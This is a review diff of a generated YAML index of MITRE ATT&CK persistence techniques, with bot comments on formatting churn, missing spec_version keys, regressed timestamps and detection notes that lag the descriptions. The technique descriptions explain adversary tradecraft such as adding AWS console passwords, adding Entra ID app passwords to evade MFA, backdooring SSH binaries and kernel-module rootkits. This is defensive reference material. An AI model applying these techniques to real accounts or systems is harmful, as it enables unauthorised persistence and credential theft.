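Review bot: the `Azure AD` to `Azure / Entra ID` rename in T1098.001 churns six lines of the description because the emitter re-wraps the double-quoted scalar at roughly 80 columns, whereas other descriptions in this same file (T1543.004, T1574.008, T1078.001, T1546.005, T1546.012, T1574.005) are emitted as `|-` literal blocks and would have produced a one-line change. Pick one scalar style for `description`, preferably the literal block with no re-wrapping, so that single-word upstream edits stay reviewable. The removal of `spec_version` and `x_mitre_attack_spec_version: 2.1.0` from T1205.001 at the top of this hunk follows the pattern already flagged for the older objects.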
@@ -32507,11 +32902,15 @@ persistence:
usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation:
Expel Behind the Scenes)\n\nAdversaries may also use the CreateAccessKey
API in AWS or the gcloud iam service-accounts keys create
command
- in GCP to add access keys to an account. If the target account has different
- permissions from the requesting account, the adversary may also be able to
- escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
+ in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile
+ API in AWS to add a password that can be used to log into the AWS Management
+ Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation:
+ Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024)
+ If the target account has different permissions from the requesting account,
+ the adversary may also be able to escalate their privileges in the environment
+ (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation:
Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel
- 2.0) For example, in Azure AD environments, an adversary with the Application
+ 2.0) For example, in Entra ID environments, an adversary with the Application
Administrator role can add a new set of credentials to their application's
service principal. In doing so the adversary would be able to access the service
principal’s roles and permissions, which may be different from those of the
@@ -32522,12 +32921,19 @@ persistence:
tied to the permissions of the original user account. These temporary credentials
may remain valid for the duration of their lifetime even if the original account’s
API credentials are deactivated.\n(Citation: Crowdstrike AWS User Federation
- Persistence)"
+ Persistence)\n\nIn Entra ID environments with the app password feature enabled,
+ adversaries may be able to add an app password to a user account.(Citation:
+ Mandiant APT42 Operations 2024) As app passwords are intended to be used with
+ legacy devices that do not support multi-factor authentication (MFA), adding
+ an app password can allow an adversary to bypass MFA requirements. Additionally,
+ app passwords may remain valid even if the user’s primary password is reset.(Citation:
+ Microsoft Entra ID App Passwords)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Expel
- Oleg Kolesnikov, Securonix
@@ -32536,6 +32942,7 @@ persistence:
- Alex Soler, AttackIQ
- Dylan Silva, AWS Security
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.
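Review bot: the `x_mitre_detection` text on the unchanged lines here still covers only Service Principal and Application modifications in Azure Activity Logs and the APIs that create or import SSH keys, while the description hunks above for this technique now add two more credential paths, the AWS `CreateLoginProfile` console password and Entra ID app passwords, neither of which gets a corresponding detection note. This is mirrored from upstream, so it is not something to patch in this file, but anyone using the detection field as guidance should treat it as incomplete for the newly described behaviour. The added contributor line is fine.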
@@ -32544,13 +32951,16 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- - Azure AD
- SaaS
- x_mitre_version: '2.7'
+ - Identity Provider
+ x_mitre_version: '2.8'
x_mitre_data_sources:
- 'User Account: User Account Modification'
+ - 'Active Directory: Active Directory Object Creation'
+ - 'Active Directory: Active Directory Object Modification'
type: attack-pattern
id: attack-pattern--8a2f40cf-8325-47f9-96e4-b1ca4c7389bd
created: '2020-01-19T16:10:15.008Z'
@@ -32576,10 +32986,18 @@ persistence:
description: Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service
Principals. Retrieved January 19, 2020.
url: https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
+ - source_name: Lacework AI Resource Hijacking 2024
+ description: Detecting AI resource-hijacking with Composite Alerts. (2024,
+ June 6). Lacework Labs. Retrieved July 1, 2024.
+ url: https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts
- source_name: GCP SSH Key Add
description: Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved
October 1, 2020.
url: https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
+ - source_name: Permiso Scattered Spider 2023
+ description: 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING
+ SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.'
+ url: https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud
- source_name: Blue Cloud of Death Video
description: 'Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming
Azure. Retrieved November 21, 2019.'
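Review bot: the two references added in this hunk, 'Lacework AI Resource Hijacking 2024' and 'Permiso Scattered Spider 2023', have no matching `(Citation: ...)` in any description change visible in this diff; if the paragraphs that cite them fall outside the shown context that is fine, otherwise they are dangling entries. Style: the Lacework description puts the title before the date and the author ('Lacework Labs') after it, whereas every neighbouring entry follows 'Author. (date). Title. Retrieved ...'.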
@@ -32588,10 +33006,20 @@ persistence:
description: 'Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming
Azure. Retrieved October 23, 2019.'
url: https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
+ - source_name: Microsoft Entra ID App Passwords
+ description: Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor
+ authentication with legacy applications using app passwords. Retrieved May
+ 28, 2024.
+ url: https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords
- source_name: Microsoft SolarWinds Customer Guidance
description: MSRC. (2020, December 13). Customer Guidance on Recent Nation-State
Cyber Attacks. Retrieved December 17, 2020.
url: https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
+ - source_name: Mandiant APT42 Operations 2024
+ description: 'Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and
+ Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran''s APT42 Operations.
+ Retrieved May 28, 2024.'
+ url: https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations
- source_name: Expel Behind the Scenes
description: 'S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020,
July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved
@@ -32608,9 +33036,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.001
atomic_tests:
- name: Azure AD Application Hijacking - Service Principal
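Review bot: `spec_version: '2.1'` is deleted here and from every other technique block in this diff without being re-added anywhere, while the two `x_mitre_*` keys removed alongside it are only relocated (to just after `kill_chain_phases` and after `x_mitre_is_subtechnique` in the earlier hunks). If dropping the STIX spec_version from the index is intentional, state it in the commit message and confirm that no consumer reading these technique objects as STIX 2.1 depends on it.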
@@ -32757,7 +33182,7 @@ persistence:
elevation_required: false
T1556.008:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-05-04T18:02:51.318Z'
name: Network Provider DLL
description: "Adversaries may register malicious network provider dynamic link
libraries (DLLs) to capture cleartext user credentials during the authentication
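Review bot: the `modified` timestamp for T1556.008 moves backwards in this hunk, from '2023-10-31T14:00:00.188Z' to '2023-05-04T18:02:51.318Z'; the same regression appears for T1546.014, T1574.010 and T1574.013 later in this diff, and every old value shares the 14:00:00.188Z suffix, which looks like a bundle release timestamp rather than the object's own `modified`. Confirm that the new values come from the canonical STIX objects and that nothing downstream treats `modified` as a monotonic 'newer than' signal before merging.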
@@ -32832,7 +33257,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.003:
technique:
@@ -32921,24 +33345,27 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.003
atomic_tests: []
T1554:
technique:
- modified: '2024-04-16T13:03:40.824Z'
+ modified: '2024-10-12T16:52:46.067Z'
name: Compromise Host Software Binary
description: |-
Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.
- Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.
+ Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify a software binary such as an SSH client in order to persistently collect credentials during logins (i.e., [Modify Authentication Process](https://attack.mitre.org/techniques/T1556)).(Citation: Google Cloud Mandiant UNC3886 2024)
An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
+
+ After modifying a binary, an adversary may attempt to [Impair Defenses](https://attack.mitre.org/techniques/T1562) by preventing it from updating (e.g., via the `yum-versionlock` command or `versionlock.list` file in Linux systems that use the yum package manager).(Citation: Google Cloud Mandiant UNC3886 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_contributors:
- CrowdStrike Falcon OverWatch
+ - Liran Ravich, CardinalOps
+ - Jamie Williams (U ω U), PANW Unit 42
x_mitre_deprecated: false
x_mitre_detection: "Collect and analyze signing certificate metadata and check
signature validity on software that executes within the environment. Look
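Review bot: the re-emitted T1554 description keeps the typo 'persistence though modifications' (should be 'through') in both the removed and the added line, and the new paragraph on blocking updates via `yum-versionlock` / `versionlock.list` is not mirrored in `x_mitre_detection`, which still speaks only of signing-certificate metadata and signature validity; both are upstream ATT&CK strings, so raise them against the source data rather than editing the generated YAML. Also, the new contributor string contains a non-ASCII character (ω), so every reader and writer of this file must treat it as UTF-8.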
@@ -32952,7 +33379,7 @@ persistence:
- Linux
- macOS
- Windows
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Deletion'
- 'File: File Modification'
@@ -32967,6 +33394,11 @@ persistence:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1554
external_id: T1554
+ - source_name: Google Cloud Mandiant UNC3886 2024
+ description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+ Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+ Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+ url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
- source_name: Unit42 Banking Trojans Hooking 2022
description: 'Or Chechik. (2022, October 31). Banking Trojan Techniques: How
Financially Motivated Malware Became Infrastructure. Retrieved September
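Review bot: the new 'Google Cloud Mandiant UNC3886 2024' reference description starts with a stray space inside the double-quoted scalar (`" Punsaen Boonyakarn, ...`), unlike every other description in the file; trim it, or fix it upstream if the text is copied verbatim from the ATT&CK source, so the rendered citation does not begin with whitespace.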
@@ -32980,11 +33412,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-09-12T15:27:11.065Z'
name: 'Event Triggered Execution: Change Default File Association'
description: "Adversaries may establish persistence by executing malicious content
triggered by a file type association. When a file is opened, the default program
@@ -33010,7 +33441,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Stefan Kanthak
@@ -33024,7 +33454,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.0'
@@ -33051,8 +33480,8 @@ persistence:
url: https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs
- source_name: Microsoft File Handlers
description: Microsoft. (n.d.). Specifying File Handlers for File Name Extensions.
- Retrieved November 13, 2014.
- url: http://msdn.microsoft.com/en-us/library/bb166549.aspx
+ Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/visualstudio/visual-studio-2015/extensibility/specifying-file-handlers-for-file-name-extensions?view=vs-2015
- source_name: Microsoft Assoc Oct 2017
description: Plett, C. et al.. (2017, October 15). assoc. Retrieved August
7, 2018.
@@ -33063,7 +33492,8 @@ persistence:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.001
atomic_tests: []
T1546.014:
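Review bot: the relocated `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` land after `object_marking_refs` for T1546.001 in this hunk, but for T1098.001 earlier in this diff the same keys were moved to sit after `kill_chain_phases` and after `x_mitre_is_subtechnique`; the generator is not emitting keys in a stable order, which is why so much of this diff is pure churn. Sorting keys (or preserving source order) in the generator would make future regenerations reviewable.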
@@ -33104,7 +33534,7 @@ persistence:
The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients
, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist
.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019)
Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T00:16:01.732Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Event Triggered Execution: Emond'
x_mitre_detection: Monitor emond rules creation by checking for files created
@@ -33124,12 +33554,11 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.014
atomic_tests: []
T1574.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:37.026Z'
name: Services File Permissions Weakness
description: |-
Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
@@ -33183,11 +33612,10 @@ persistence:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1547.001:
technique:
- modified: '2023-10-16T09:08:22.319Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: 'Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder'
description: |-
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.(Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -33274,9 +33702,9 @@ persistence:
in the Registry. Retrieved August 3, 2020.
url: https://docs.microsoft.com/en-us/windows/win32/sysinfo/32-bit-and-64-bit-application-data-in-the-registry
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Oddvar Moe RunOnceEx Mar 2018
description: Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden
from Autoruns.exe. Retrieved June 29, 2018.
@@ -33289,12 +33717,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.001
atomic_tests: []
T1136.003:
technique:
- modified: '2024-03-28T16:14:28.678Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Create Account: Cloud Account'
description: |-
Adversaries may create a cloud account to maintain access to victim systems. With a sufficient level of access, such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.(Citation: Microsoft O365 Admin Roles)(Citation: Microsoft Support O365 Add Another Admin, October 2019)(Citation: AWS Create IAM User)(Citation: GCP Create Cloud Identity Users)(Citation: Microsoft Azure AD Users)
@@ -33307,9 +33734,11 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Praetorian
- Microsoft Threat Intelligence Center (MSTIC)
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Collect usage logs from cloud user and administrator accounts
to identify unusual activity in the creation of new accounts and assignment
@@ -33318,13 +33747,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- IaaS
- - Google Workspace
- SaaS
- x_mitre_version: '1.5'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Creation'
type: attack-pattern
@@ -33372,9 +33801,6 @@ persistence:
url: https://support.office.com/en-us/article/add-another-admin-f693489f-9f55-4bd0-a637-a81ce93de22d
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1136.003
atomic_tests:
- name: Azure AD - Create a new user
@@ -33468,7 +33894,7 @@ persistence:
name: powershell
T1098:
technique:
- modified: '2024-01-16T22:24:38.234Z'
+ modified: '2024-10-15T15:35:57.382Z'
name: Account Manipulation
description: "Adversaries may manipulate accounts to maintain and/or elevate
access to victim systems. Account manipulation may consist of any action that
@@ -33504,16 +33930,15 @@ persistence:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- IaaS
- Linux
- macOS
- - Google Workspace
- SaaS
- Network
- Containers
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -33554,7 +33979,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098
atomic_tests:
- name: Azure AD - adding user to Azure AD role
@@ -33793,138 +34217,137 @@ persistence:
elevation_required: false
T1547.006:
technique:
- x_mitre_platforms:
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-12T17:30:54.170Z'
+ name: 'Boot or Logon Autostart Execution: Kernel Modules and Extensions'
+ description: |-
+ Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.(Citation: Linux Kernel Programming)
+
+ When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
+
+ Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through kextload
and kextunload
commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
+
+ Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
+
+ Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
x_mitre_contributors:
- Wayne Silva, F-Secure Countercept
- Anastasios Pingios
- Jeremy Galloway
- Red Canary
- Eric Kaiser @ideologysec
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: |
+ Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe
, insmod
, lsmod
, rmmod
, or modinfo
(Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules
and have had the extension .ko ("kernel object") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)
+
+ Adversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r)
On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)
+
+ On macOS, monitor for execution of kextload
commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy
table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy
.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Command: Command Execution'
+ - 'File: File Creation'
+ - 'File: File Modification'
+ - 'Kernel: Kernel Module Load'
+ - 'Process: Process Creation'
+ x_mitre_permissions_required:
+ - root
type: attack-pattern
id: attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6
created: '2020-01-24T17:42:23.339Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1547.006
url: https://attack.mitre.org/techniques/T1547/006
+ external_id: T1547.006
- source_name: Apple Developer Configuration Profile
- url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
description: Apple. (2019, May 3). Configuration Profile Reference. Retrieved
September 23, 2021.
+ url: https://developer.apple.com/business/documentation/Configuration-Profile-Reference.pdf
- source_name: Apple Kernel Extension Deprecation
- url: https://developer.apple.com/support/kernel-extensions/
description: Apple. (n.d.). Deprecated Kernel Extensions and System Extension
Alternatives. Retrieved November 4, 2020.
+ url: https://developer.apple.com/support/kernel-extensions/
- source_name: System and kernel extensions in macOS
- url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
description: Apple. (n.d.). System and kernel extensions in macOS. Retrieved
March 31, 2022.
+ url: https://support.apple.com/guide/deployment/system-and-kernel-extensions-in-macos-depa5fb8376f/web
- source_name: GitHub Reptile
- url: https://github.com/f0rb1dd3n/Reptile
description: Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved
April 9, 2018.
+ url: https://github.com/f0rb1dd3n/Reptile
- source_name: Volatility Phalanx2
- url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
description: 'Case, A. (2012, October 10). Phalanx 2 Revealed: Using Volatility
to Analyze an Advanced Linux Rootkit. Retrieved April 9, 2018.'
+ url: https://volatility-labs.blogspot.com/2012/10/phalanx-2-revealed-using-volatility-to.html
- source_name: iDefense Rootkit Overview
- url: http://www.megasecurity.org/papers/Rootkits.pdf
description: Chuvakin, A. (2003, February). An Overview of Rootkits. Retrieved
- April 6, 2018.
+ September 12, 2024.
+ url: https://www.megasecurity.org/papers/Rootkits.pdf
- source_name: Linux Loadable Kernel Module Insert and Remove LKMs
- url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
description: Henderson, B. (2006, September 24). How To Insert And Remove
LKMs. Retrieved April 9, 2018.
+ url: http://tldp.org/HOWTO/Module-HOWTO/x197.html
- source_name: CrowdStrike Linux Rootkit
- url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
description: Kurtz, G. (2012, November 19). HTTP iframe Injecting Linux Rootkit.
Retrieved December 21, 2017.
+ url: https://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/
- source_name: GitHub Diamorphine
- url: https://github.com/m0nad/Diamorphine
description: Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux
Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.
+ url: https://github.com/m0nad/Diamorphine
- source_name: Securelist Ventir
- url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
description: 'Mikhail, K. (2014, October 16). The Ventir Trojan: assemble
your MacOS spy. Retrieved April 6, 2018.'
+ url: https://securelist.com/the-ventir-trojan-assemble-your-macos-spy/67267/
- source_name: User Approved Kernel Extension Pike’s
- url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
description: Pikeralpha. (2017, August 29). User Approved Kernel Extension
Loading…. Retrieved September 23, 2021.
+ url: https://pikeralpha.wordpress.com/2017/08/29/user-approved-kernel-extension-loading/
- source_name: Linux Kernel Module Programming Guide
- url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
description: Pomerantz, O., Salzman, P. (2003, April 4). Modules vs Programs.
Retrieved April 6, 2018.
+ url: http://www.tldp.org/LDP/lkmpg/2.4/html/x437.html
- source_name: Linux Kernel Programming
- url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
description: Pomerantz, O., Salzman, P.. (2003, April 4). The Linux Kernel
Module Programming Guide. Retrieved April 6, 2018.
+ url: https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf
- source_name: Trend Micro Skidmap
- url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
description: Remillano, A., Urbanec, J. (2019, September 19). Skidmap Linux
Malware Uses Rootkit Capabilities to Hide Cryptocurrency-Mining Payload.
Retrieved June 4, 2020.
+ url: https://blog.trendmicro.com/trendlabs-security-intelligence/skidmap-linux-malware-uses-rootkit-capabilities-to-hide-cryptocurrency-mining-payload/
